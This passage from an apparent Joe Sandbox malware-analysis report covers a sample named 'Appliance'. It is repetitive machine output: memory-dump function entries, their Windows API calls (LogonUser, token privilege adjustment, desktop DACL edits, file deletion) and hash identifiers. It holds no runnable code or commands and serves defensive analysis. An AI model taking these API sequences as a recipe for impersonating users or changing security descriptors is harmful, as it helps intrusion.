                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                            • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                            • Instruction ID: b1b578bb4760fc493eaa29e24190fe82ce835fd3018db5d8a9263ea907c72738
                                                                                                                                            • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                            • Instruction Fuzzy Hash: 5D01FE7210074D6BE3318F59E84196AFBEDEF85370F66451DE78483280EB71A905C774
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                            • Instruction ID: 72a625dbff400077845094c064877afc72f4d54f62e140ef5ff24149fcff8fb2
                                                                                                                                            • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                            • Instruction Fuzzy Hash: 00F0F432501A6457D6313B2B9C05B7A33D9CF42330F154726FA65971D2EF74E9028AF2
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                            • Opcode ID: 1fd9e9838c0c810596d1dd782179c38820d140f839fa7559100d4ce99555d4bf
                                                                                                                                            • Instruction ID: c0322ffa8518dd56e59dc88d7b27ab7274a219543f53e94ba4c66987f3db438d
                                                                                                                                            • Opcode Fuzzy Hash: 1fd9e9838c0c810596d1dd782179c38820d140f839fa7559100d4ce99555d4bf
                                                                                                                                            • Instruction Fuzzy Hash: 9AF0F4B26007416EC710AF29C806F66BF98EB44360F10822EFA19CB1D0DB71E410CAB0
                                                                                                                                            APIs
                                                                                                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00E3F987
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1431749950-0
                                                                                                                                            • Opcode ID: 49aa22f041bde84ab22aab71746ac221b646859a32d4345f6154fc130c29ad6a
                                                                                                                                            • Instruction ID: cf98b03a92c5a8f8de630b7fdd763dbe77b428f61c2e055b65e38f2ef1a7a4fa
                                                                                                                                            • Opcode Fuzzy Hash: 49aa22f041bde84ab22aab71746ac221b646859a32d4345f6154fc130c29ad6a
                                                                                                                                            • Instruction Fuzzy Hash: A9F01D76600205BFCB15EBA5DC4AE9E7BACEF55710F004059F505AB261DA70A981C771
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00DF319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00DF5031
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: c312b4e338b5c5dd8b9c8db4e3122825932a10a805e126532816f36443c0401d
                                                                                                                                            • Instruction ID: 42b489de96b07fe3a7a9235265f307349d07af90e175241d426ff58b42090a86
                                                                                                                                            • Opcode Fuzzy Hash: c312b4e338b5c5dd8b9c8db4e3122825932a10a805e126532816f36443c0401d
                                                                                                                                            • Instruction Fuzzy Hash: 39F0B432551E2867DB316A67FC01F7A3748AF417E0F1BC022BF04AB098DE20D84146F0
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00DE6A79,?,0000015D,?,?,?,?,00DE85B0,000000FF,00000000,?,?), ref: 00DF3BC5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: 4ff4c05a97f23f9f15df93184144ffe12638209ed3df3d4af20fc9990927e812
                                                                                                                                            • Instruction ID: c1bb0cb00188d294d82edf0c613e62c6c66f603c2b338ef5109426c4b549bd8a
                                                                                                                                            • Opcode Fuzzy Hash: 4ff4c05a97f23f9f15df93184144ffe12638209ed3df3d4af20fc9990927e812
                                                                                                                                            • Instruction Fuzzy Hash: E6E0E52124166967DA303673DC15B7B3648EF013A0F1B8121EE44A6190DB30CD4081B0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c6db304eed29c0022aa69b32e9ca5535a63d536c4b0c05814ef78adfbf5f3b3a
                                                                                                                                            • Instruction ID: 2663e7725ae5718f0d79fd34b01c55075681d426c51fde7309deb6e7fcda8191
                                                                                                                                            • Opcode Fuzzy Hash: c6db304eed29c0022aa69b32e9ca5535a63d536c4b0c05814ef78adfbf5f3b3a
                                                                                                                                            • Instruction Fuzzy Hash: DEF03971105B02CFCB349F65E9A0916BBE4BF1432A3248D7EE1D697A60CB72D884DF21
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                            • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                            • Instruction ID: cdef3c459b98ed31943f8c8ee1e6d2e64b20bb9b60888592ba63a33ea809c9b1
                                                                                                                                            • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                            • Instruction Fuzzy Hash: 25F0F87650020DFFDF05DF90C941E9E7B79FF04318F248489F9159A151C336EA61ABA1
                                                                                                                                            APIs
                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00DC3963
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                            • Opcode ID: 007abc57197f10987f4bca4468a9bf8526f830b5c059c9ea51b4f889d904ee54
                                                                                                                                            • Instruction ID: ef72f880a118ca7f8f1235ff89a9ea6072eb1824acdb757a3e393422882d08a2
                                                                                                                                            • Opcode Fuzzy Hash: 007abc57197f10987f4bca4468a9bf8526f830b5c059c9ea51b4f889d904ee54
                                                                                                                                            • Instruction Fuzzy Hash: F7F0A770904305AFEB62DF25DC467D57BBCA70170CF0001AEA244A7181DB74478CCF91
                                                                                                                                            APIs
                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00DC3A76
                                                                                                                                              • Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 541455249-0
                                                                                                                                            • Opcode ID: 5db1a78be22ad745a4281f551a58413c2e7800e8684ecd581cc28a75696003c8
                                                                                                                                            • Instruction ID: 197c28116f1a748110b7fee700f6bd3ac8da73409c0143411596e4e0cdef0d60
                                                                                                                                            • Opcode Fuzzy Hash: 5db1a78be22ad745a4281f551a58413c2e7800e8684ecd581cc28a75696003c8
                                                                                                                                            • Instruction Fuzzy Hash: 75E0CD769042245BC72092589C05FDA77DDDFC8790F044075FD09E7254D960DDC095A0
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00E00A84,?,?,00000000,?,00E00A84,00000000,0000000C), ref: 00E00737
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: aa40f721e9f4d66800fd5fcd14d9d2a6c0c4a8d41caa12df6800a93a70df40ea
                                                                                                                                            • Instruction ID: 2359a4f34b6f30b394e46e61c113df2e11bf10e294331b8db415fc50f677d235
                                                                                                                                            • Opcode Fuzzy Hash: aa40f721e9f4d66800fd5fcd14d9d2a6c0c4a8d41caa12df6800a93a70df40ea
                                                                                                                                            • Instruction Fuzzy Hash: A9D06C3200020DBFDF129F85DD06EDA3BAAFB48714F014000BE5866020C732E821AB90
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00E2D840), ref: 00E2EAB1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 8bf4d0313fc22b82224d4655b9404505ed273333cf454541aef180e17fbfe675
                                                                                                                                            • Instruction ID: 6119f816eaf92ba74afab9f85105adc45b8e5752f573bf2442e68e0a05ee6752
                                                                                                                                            • Opcode Fuzzy Hash: 8bf4d0313fc22b82224d4655b9404505ed273333cf454541aef180e17fbfe675
                                                                                                                                            • Instruction Fuzzy Hash: 47B092A800462009AD280A386A0A999330079423AABDC3FC0E479A52F1D339884FA955
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E2DC54: FindFirstFileW.KERNEL32(?,?), ref: 00E2DCCB
                                                                                                                                              • Part of subcall function 00E2DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00E2DD1B
                                                                                                                                              • Part of subcall function 00E2DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E2DD2C
                                                                                                                                              • Part of subcall function 00E2DC54: FindClose.KERNEL32(00000000), ref: 00E2DD43
                                                                                                                                            • GetLastError.KERNEL32 ref: 00E3666E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2191629493-0
                                                                                                                                            • Opcode ID: 6a14feecfb430cc16bbbf9ee5f3c302938ea6b1b527666577905399f1ec09fab
                                                                                                                                            • Instruction ID: 048810e6c7fd2f80ed72113b6986c812d8c0d16107629c37d07c06f761d606db
                                                                                                                                            • Opcode Fuzzy Hash: 6a14feecfb430cc16bbbf9ee5f3c302938ea6b1b527666577905399f1ec09fab
                                                                                                                                            • Instruction Fuzzy Hash: 78F058362042109FCB14AF59D845F6ABBE9EF88760F048449F949AB352CB70BC01CBA1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E22010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E2205A
                                                                                                                                              • Part of subcall function 00E22010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E22087
                                                                                                                                              • Part of subcall function 00E22010: GetLastError.KERNEL32 ref: 00E22097
                                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E21BD2
                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E21BF4
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00E21C05
                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E21C1D
                                                                                                                                            • GetProcessWindowStation.USER32 ref: 00E21C36
                                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00E21C40
                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E21C5C
                                                                                                                                              • Part of subcall function 00E21A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E21B48), ref: 00E21A20
                                                                                                                                              • Part of subcall function 00E21A0B: CloseHandle.KERNEL32(?,?,00E21B48), ref: 00E21A35
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                            • String ID: $default$winsta0$j
                                                                                                                                            • API String ID: 22674027-2615587742
                                                                                                                                            • Opcode ID: 855147ae0c91296276f156e65d2d118550a88d2b662bd498d7debbe90b9d1d0e
                                                                                                                                            • Instruction ID: 2c16eeab61aa58d504dc21eefd3dc7453a7a372e7e826af8d6823b18dbdc7efa
                                                                                                                                            • Opcode Fuzzy Hash: 855147ae0c91296276f156e65d2d118550a88d2b662bd498d7debbe90b9d1d0e
                                                                                                                                            • Instruction Fuzzy Hash: FC817771900318AFDF259FA1EC49FEE7BB8EF08306F1454A9F914B61A0D7718A49CB60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E21A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E21A60
                                                                                                                                              • Part of subcall function 00E21A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A6C
                                                                                                                                              • Part of subcall function 00E21A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A7B
                                                                                                                                              • Part of subcall function 00E21A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A82
                                                                                                                                              • Part of subcall function 00E21A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E21A99
                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E21518
                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E2154C
                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00E21563
                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00E2159D
                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E215B9
                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00E215D0
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E215D8
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00E215DF
                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E21600
                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00E21607
                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E21636
                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E21658
                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E2166A
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E21691
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00E21698
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E216A1
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00E216A8
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E216B1
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00E216B8
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00E216C4
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00E216CB
                                                                                                                                              • Part of subcall function 00E21ADF: GetProcessHeap.KERNEL32(00000008,00E214FD,?,00000000,?,00E214FD,?), ref: 00E21AED
                                                                                                                                              • Part of subcall function 00E21ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E214FD,?), ref: 00E21AF4
                                                                                                                                              • Part of subcall function 00E21ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E214FD,?), ref: 00E21B03
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4175595110-0
